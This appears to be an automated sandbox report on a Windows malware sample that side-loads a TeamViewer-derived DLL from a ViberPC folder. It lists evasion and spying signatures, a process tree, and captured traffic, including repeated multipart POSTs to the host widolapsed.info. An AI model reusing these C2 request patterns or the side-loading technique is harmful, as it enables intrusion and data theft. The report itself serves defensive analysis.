Loading ...

Play interactive tourEdit tour

Windows Analysis Report wogZe27GBB.exe

Overview

General Information

Sample Name:wogZe27GBB.exe
Analysis ID:483790
MD5:5efc68abd7fec415e34980d95a06a66a
SHA1:34b243a0b3e322b8983b528caa5849395360a91d
SHA256:0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags:exeMappingOOOsigned
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:17
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 7160 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 4260 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 5356 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 4296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5904 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 6852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6952 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 7016 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 7080 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6484 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 5248 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: wogZe27GBB.exeVirustotal: Detection: 53%Perma Link
Source: wogZe27GBB.exeReversingLabs: Detection: 62%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllReversingLabs: Detection: 51%
Source: 0.2.wogZe27GBB.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0049B32E __EH_prolog3,CryptGenRandom,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_006F605B CryptReleaseContext,
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
DLL planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: wogZe27GBB.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85991Content-Type: multipart/form-data; boundary=--------988836371User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 86008Content-Type: multipart/form-data; boundary=--------2871961252User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85958Content-Type: multipart/form-data; boundary=--------2035396243User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12251267&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12251267&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: unknownTCP traffic detected without corresponding DNS query: 188.172.235.146
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","P